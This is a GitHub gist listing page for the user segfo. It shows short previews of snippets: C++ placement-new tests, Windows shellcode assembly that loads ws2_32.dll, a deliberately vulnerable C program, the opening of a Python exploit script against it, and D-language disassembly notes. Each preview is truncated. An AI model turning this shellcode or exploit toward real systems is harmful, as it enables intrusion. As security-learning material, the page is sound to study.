Skip to content

Instantly share code, notes, and snippets.

View segfo's full-sized avatar

segfo segfo

22 followers · 5 following
View GitHub Profile
@segfo
segfo / TestClass.cpp
Created October 11, 2015 12:22
#include "TestClass.h"
#include<iostream>
using namespace std;
TestClass::TestClass(){}
TestClass::TestClass(char *s)
{
this->s = s;
@segfo
segfo / TestClass.h
Created October 11, 2015 12:25
#pragma once
class TestClass
{
public:
TestClass();
TestClass(char *s);
~TestClass();
void Print();
private:
char* s = nullptr;
@segfo
segfo / Main.cpp
Created October 11, 2015 12:25
#include<iostream>
#include<string>
#include"TestClass.h"
using namespace std;
int main() {
static char buf[sizeof(TestClass)*10];
cout << sizeof(TestClass) << endl;
TestClass *t1 = new(buf) TestClass("AAAAAAA");
@segfo
segfo / shellcode_difference.asm
Last active December 12, 2015 06:09
shellcode.asm
main:
 ; LoadLibrary("ws2_32.dll") をする
mov ax,0x6c6c
movzx eax,ax
push eax
push 0x642e3233
push 0x5f327377
push esp ; ws2_32.dll
push 0xec0e4e8e ; LoadLibraryA
call api_call
@segfo
segfo / vulnBinReader.c
Created December 12, 2015 06:12
#include<stdio.h>
#include<stdlib.h>
#include<Windows.h>
unsigned char globalValue[0x400] = { 0 };
#define MEMSTR ("VirtualProtect.\n")
#define VALLOC_SIZE 0x2000
void somewhere() {
@segfo
segfo / vulnBinReaderExploit.py
Created December 12, 2015 06:16
#!/usr/bin/python
#coding: utf-8
import struct
import os
p32 = lambda x:struct.pack("<l",x)
addr = 0x00514E88
fixedMemory = p32(addr)
@segfo
segfo / winshellcode_full.asm
Created December 13, 2015 03:25
[bits 32]
org DEF_ADDRESS
segment .text
start:
cld
jmp short main
api_call:
pushad
xor eax, eax
@segfo
segfo / minimal-d_segfover_object.d
Last active July 8, 2016 18:07
object.dを適当に改造したやつ
// object.d 1141-1165行
extern (C)
{
version (OSX)
{
// Set by rt.memory_osx.onAddImage()
__gshared ubyte[] _deh_eh_array;
}
else
{
@segfo
segfo / minimal-d_segfov_sections.asm
Created July 8, 2016 17:43
08050100 dd 0x00000000 ; XREF=EntryPoint_1+33
;
; Section minfo
;
; Range 0x80534a8 - 0x80534c8 (32 bytes)
; File offset 42152 (32 bytes)
;
080534a8 dd 0x0804d3b4 ; XREF=EntryPoint_1+27
080534ac db 0xdc ; '.'
@segfo
segfo / minimal-d_segfover_dso_registry_caller.asm
Last active July 8, 2016 17:47
minimal-dをディスアセンブルした時のやつ
EntryPoint_1
08048385 mov ebp, esp
08048387 sub esp, 0x8
0804838d mov eax, 0x80534e0 ;immutable(void)* _deh_end;
08048392 push eax
08048393 mov eax, 0x80534c8 ;immutable(void)* _deh_beg;
08048398 push eax
08048399 mov eax, 0x80534c8 ;object.ModuleInfo** _minfo_end;
0804839e push eax
0804839f mov eax, 0x80534a8 ;object.ModuleInfo** _minfo_beg;